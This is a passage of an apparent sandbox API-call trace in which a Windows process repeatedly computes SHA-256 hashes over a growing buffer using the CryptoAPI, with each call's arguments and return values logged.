	[0119.046] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe0e0
	[0119.046] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe0e0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe0e0, pdwDataLen=0x12942c) returned 1
	[0119.046] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.046] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.046] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.046] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.046] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0119.046] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe108
	[0119.046] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe108, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe108, pdwDataLen=0x12942c) returned 1
	[0119.046] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.046] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.046] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.046] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.047] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0119.047] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe130
	[0119.047] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe130, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe130, pdwDataLen=0x12942c) returned 1
	[0119.047] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.047] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.047] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.047] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.047] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0119.047] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe158
	[0119.047] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe158, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe158, pdwDataLen=0x12942c) returned 1
	[0119.047] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.047] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.047] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.047] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.048] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0119.048] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe180
	[0119.048] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe180, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe180, pdwDataLen=0x12942c) returned 1
	[0119.048] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.048] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.048] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.048] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.048] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0119.048] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe1a8
	[0119.048] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe1a8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe1a8, pdwDataLen=0x12942c) returned 1
	[0119.048] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.048] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.048] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.048] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.048] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0119.049] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe1d0
	[0119.049] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe1d0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe1d0, pdwDataLen=0x12942c) returned 1
	[0119.049] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.049] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.049] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.049] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.049] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0119.049] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.049] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe1f8
	[0119.049] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe1f8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe1f8, pdwDataLen=0x12942c) returned 1
	[0119.049] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.049] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.049] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.049] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.049] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0119.050] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe220
	[0119.050] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe220, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe220, pdwDataLen=0x12942c) returned 1
	[0119.050] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.050] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.050] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.050] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.050] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0119.050] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.050] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe248
	[0119.050] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe248, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe248, pdwDataLen=0x12942c) returned 1
	[0119.050] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.050] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.050] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.050] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.050] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0119.051] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe270
	[0119.051] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe270, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe270, pdwDataLen=0x12942c) returned 1
	[0119.051] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.051] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.051] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.051] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.051] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0119.051] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe298
	[0119.051] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe298, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe298, pdwDataLen=0x12942c) returned 1
	[0119.051] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.051] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.051] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.051] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.051] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0119.051] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe2c0
	[0119.052] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe2c0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe2c0, pdwDataLen=0x12942c) returned 1
	[0119.052] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.052] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.052] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.052] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.052] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0119.052] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe2e8
	[0119.052] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe2e8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe2e8, pdwDataLen=0x12942c) returned 1
	[0119.052] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.052] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.052] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.052] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.052] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0119.053] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe310
	[0119.053] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe310, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe310, pdwDataLen=0x12942c) returned 1
	[0119.053] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.053] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.053] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.053] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.053] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0119.053] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe338
	[0119.053] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe338, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe338, pdwDataLen=0x12942c) returned 1
	[0119.053] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.053] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.053] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.053] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.054] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0119.054] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe360
	[0119.054] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe360, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe360, pdwDataLen=0x12942c) returned 1
	[0119.054] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.054] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.054] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.054] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.054] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0119.054] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe388
	[0119.054] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe388, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe388, pdwDataLen=0x12942c) returned 1
	[0119.054] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.054] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.054] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.054] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.054] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0119.055] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe3b0
	[0119.055] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe3b0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe3b0, pdwDataLen=0x12942c) returned 1
	[0119.055] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.055] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.055] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.055] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.055] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0119.055] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe3d8
	[0119.055] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe3d8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe3d8, pdwDataLen=0x12942c) returned 1
	[0119.055] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.055] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.055] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.055] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.055] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0119.056] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe400
	[0119.056] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe400, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe400, pdwDataLen=0x12942c) returned 1
	[0119.056] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.056] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.056] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.056] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.056] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0119.056] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe428
	[0119.056] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe428, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe428, pdwDataLen=0x12942c) returned 1
	[0119.056] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.056] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.056] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.056] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.056] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0119.057] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe450
	[0119.057] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe450, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe450, pdwDataLen=0x12942c) returned 1
	[0119.057] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.057] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.057] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.057] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.057] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0119.057] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe478
	[0119.057] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe478, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe478, pdwDataLen=0x12942c) returned 1
	[0119.057] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.057] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.057] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.057] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.057] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0119.058] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe4a0
	[0119.058] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe4a0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe4a0, pdwDataLen=0x12942c) returned 1
	[0119.058] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.058] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.058] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.058] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.058] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0119.058] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe4c8
	[0119.058] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe4c8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe4c8, pdwDataLen=0x12942c) returned 1
	[0119.058] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.058] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.058] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
